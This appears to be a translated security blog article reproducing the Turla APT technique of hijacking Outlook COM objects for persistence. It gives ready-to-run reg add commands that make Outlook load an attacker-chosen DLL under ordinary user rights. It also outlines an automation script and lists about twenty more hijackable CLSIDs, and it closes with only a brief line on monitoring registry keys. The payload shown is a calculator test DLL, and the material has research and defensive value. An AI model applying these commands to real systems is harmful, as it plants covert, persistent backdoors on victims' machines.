0x00 Preface

---

A backdoor exploitation method used by APT group Trula, which loads a DLL when Outlook starts via COM hijacking. Its characteristic is that it only requires the current user's permissions to achieve persistence.

This article will test this method based on publicly available information, develop an automated exploitation script, explore extended usage, share multiple viable hijacking locations, and provide defense recommendations along with exploitation concepts.

References:

https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf

0x01 Introduction

---

This article will cover the following:

  • Exploitation Method
  • Details of PowerShell Script Implementation
  • Extended Usage
  • Defense Recommendations

0x02 Exploitation Method

---

Outlook loads multiple COM objects during startup. We can hijack Outlook's startup process by modifying the registry to load a DLL.

This exploitation method requires adding two registry entries and modifying two COM objects.

Since we are modifying the HKCU registry, current user privileges are sufficient.

(1) COM Object 1, used to load the second COM object

Add the following registry entry:

HKCU\Software\Classes\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs = {49CBB1C7-97D1-485A-9EC1-A26065633066}

The command to implement this via command line is as follows:

reg add HKCU\Software\Classes\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs /t REG_SZ /d "{49CBB1C7-97D1-485A-9EC1-A26065633066}" /f

(2) COM Object 2, used to load the DLL

Add the following registry entries:

HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} = Mail Plugin
HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 = [Path to the backdoor DLL]
HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32\ThreadingModel = Apartment

The command to implement this via command line is as follows:

reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} /t REG_SZ /d "Mail Plugin" /f
reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /t REG_SZ /d "c:\\test\\calc.dll" /f
reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /v ThreadingModel /t REG_SZ /d "Apartment" /f

calc.dll can use the previous test DLL, available at: an open-source project

After adding the registry, launch Outlook, which loads the DLL multiple times and pops up multiple calculators. A mutex can be used here to ensure only one calculator pops up. DLL download address:

an open-source project

For 64-bit Windows systems with 32-bit Office installed, the registry location for the two COM objects needs to be modified to HKCU\Software\Classes\Wow6432Node\CLSID\

0x03 PowerShell Script Implementation Details

---

The implementation process is as follows:

  1. Determine the operating system bitness
  2. Determine the Office software version
  3. If it's a 64-bit system with 32-bit Office installed, the registry location is HKCU\Software\Classes\Wow6432Node\CLSID\; otherwise, the registry location is HKCU\Software\Classes\CLSID\
  4. Add the corresponding registry entries

The specific code is as follows:

1. Determine the operating system bitness

if ([IntPtr]::Size -eq 8)
{
'64-bit'
}
else
{
'32-bit'
}

2. Determine the installed Office software version

Check if the default installation path C:\Program Files\Microsoft Office contains the MEDIA folder

If it contains, then it is 64-bit Office, otherwise it is 32-bit Office

PowerShell code is as follows:

Try
{
dir C:\Program Files\Microsoft Office\MEDIA
Write-Host "Microsoft Office: 64-bit"
}
Catch
{
Write-Host "Microsoft Office: 32-bit"
}

The implementation code has been open-sourced at the following address:

An open-source project

The code automatically determines the operating system architecture and Office software version, then adds corresponding registry entries

0x04 Extended Usage

---

Use Process Monitor to monitor the Outlook startup process and identify other available COM objects

Testing revealed multiple available methods in Outlook 2013

Replace COM object 1 with any of the following, while keeping COM object 2 unchanged

Available COM object 1:

  • {B056521A-9B10-425E-B616-1FCD828DB3B1}
  • {EFEF7FDB-0CED-4FB6-B3BB-3C50D39F4120}
  • {93E5752E-B889-47C5-8545-654EE2533C64}
  • {56FDF344-FD6D-11D0-958A-006097C9A090}
  • {2163EB1F-3FD9-4212-A41F-81D1F933597F}
  • {A6A2383F-AD50-4D52-8110-3508275E77F7}
  • {F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}
  • {88D96A05-F192-11D4-A65F-0040963251E5}
  • {807583E5-5146-11D5-A672-00B0D022E945}
  • {529A9E6B-6587-4F23-AB9E-9C7D683E3C50}
  • {3CE74DE4-53D3-4D74-8B83-431B3828BA53}
  • {A4B544A1-438D-4B41-9325-869523E2D6C7}
  • {33C53A50-F456-4884-B049-85FD643ECFED}
  • {C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}
  • {275C23E2-3747-11D0-9FEA-00AA003F8646}
  • {C15BB852-6F97-11D3-A990-00104B2A619F}
  • {ED475410-B0D6-11D2-8C3B-00104B2A6676}
  • {1299CF18-C4F5-4B6A-BB0F-2299F0398E27}
  • {DCB00C01-570F-4A9B-8D69-199FDBA5723B}
  • {C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}

0x05 Defense Recommendations

---

Monitor creation and modification operations under the following registry keys:

  • HKCU\Software\Classes\CLSID\
  • HKCU\Software\Classes\Wow6432Node\CLSID\

0x06 Summary

---

This article introduces a method to load a DLL during Outlook startup via COM hijacking, shares multiple available hijacking locations, and provides defense recommendations based on exploitation techniques.